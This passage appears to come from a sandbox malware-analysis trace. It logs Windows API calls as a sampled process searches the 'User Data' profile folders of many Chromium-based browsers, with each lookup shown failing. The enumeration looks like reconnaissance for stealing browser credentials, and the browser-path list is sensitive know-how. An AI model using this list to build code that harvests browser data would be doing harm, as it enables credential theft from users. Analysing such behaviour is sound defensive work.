SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.876] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x39 [0279.876] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\", lpFilePart=0x0) returned 0x3a [0279.876] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\centbrowser\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.877] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.878] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.878] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data") returned 0x35 [0279.879] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.879] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x34 [0279.879] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\", lpFilePart=0x0) returned 0x35 [0279.879] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chedot\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.879] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.881] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.881] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data") returned 0x36 [0279.882] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.882] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x35 [0279.882] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\", lpFilePart=0x0) returned 0x36 [0279.882] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\vivaldi\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.882] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.885] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.885] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data") returned 0x35 [0279.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.885] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x34 [0279.885] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\", lpFilePart=0x0) returned 0x35 [0279.886] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\kometa\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.886] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.888] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.888] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data") returned 0x3f [0279.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.888] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3e [0279.888] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\", lpFilePart=0x0) returned 0x3f [0279.888] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\elements browser\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.891] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.891] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data") returned 0x43 [0279.891] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.891] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x42 [0279.891] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\", lpFilePart=0x0) returned 0x43 [0279.891] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Epic Privacy Browser\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\epic privacy browser\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.892] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.894] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.894] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned 0x3d [0279.895] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.895] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x3c [0279.895] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\", lpFilePart=0x0) returned 0x3d [0279.895] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucozmedia\\uran\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.895] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.897] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.897] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer") returned 0x58 [0279.897] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.897] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x57 [0279.897] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\", lpFilePart=0x0) returned 0x58 [0279.897] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\fenrir inc\\sleipnir5\\setting\\modules\\chromiumviewer\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.899] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.899] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data") returned 0x43 [0279.900] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.900] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x42 [0279.900] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\", lpFilePart=0x0) returned 0x43 [0279.900] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\catalinagroup\\citrio\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.902] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.902] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data") returned 0x3c [0279.903] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.903] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x3b [0279.903] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\", lpFilePart=0x0) returned 0x3c [0279.903] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coowon\\coowon\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.905] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.905] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\liebao\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data") returned 0x35 [0279.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.906] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x34 [0279.906] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data\\", lpFilePart=0x0) returned 0x35 [0279.906] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\liebao\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.906] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.908] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.908] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data") returned 0x37 [0279.908] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.908] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x36 [0279.908] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\", lpFilePart=0x0) returned 0x37 [0279.908] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\qip surf\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.909] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.911] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.911] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data") returned 0x36 [0279.911] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.911] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x35 [0279.912] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\", lpFilePart=0x0) returned 0x36 [0279.912] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\orbitum\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.914] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.914] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data") returned 0x3c [0279.914] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1a0) returned 1 [0279.915] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x19eca8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x3b [0279.915] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\", nBufferLength=0x105, lpBuffer=0x19ec7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\", lpFilePart=0x0) returned 0x3c [0279.915] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comodo\\dragon\\user data\\*"), lpFindFileData=0x19eec8 | out: lpFindFileData=0x19eec8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0279.915] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f164) returned 1 [0279.917] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x19f104, nSize=0x64 | out: lpDst="C:\\Users\\RDhJ0CNFevzX") returned 0x16 [0279.917] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", lpDst=0x19f104, nSize=0x64 | out: 